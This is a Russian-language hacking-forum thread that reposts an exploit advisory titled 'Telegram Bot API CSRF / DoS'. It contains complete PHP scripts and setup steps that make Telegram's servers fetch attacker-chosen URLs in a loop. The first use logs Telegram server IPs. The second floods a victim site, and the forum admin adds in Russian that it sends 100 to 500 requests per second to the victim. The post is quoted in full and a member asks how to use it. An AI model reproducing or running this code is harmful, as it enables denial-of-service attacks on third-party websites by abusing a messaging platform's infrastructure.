Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin

Administrator
Сообщения
1 547
Оценка реакций
487
Код:
###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
 

dkfancska

Member
Сообщения
57
Оценка реакций
16
Код:
###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
А можно поподробнее что с этим делать
 

Admin

Administrator
Сообщения
1 547
Оценка реакций
487
В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.
 

HATRED

Member
Сообщения
25
Оценка реакций
14
В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.
спасибо за ответ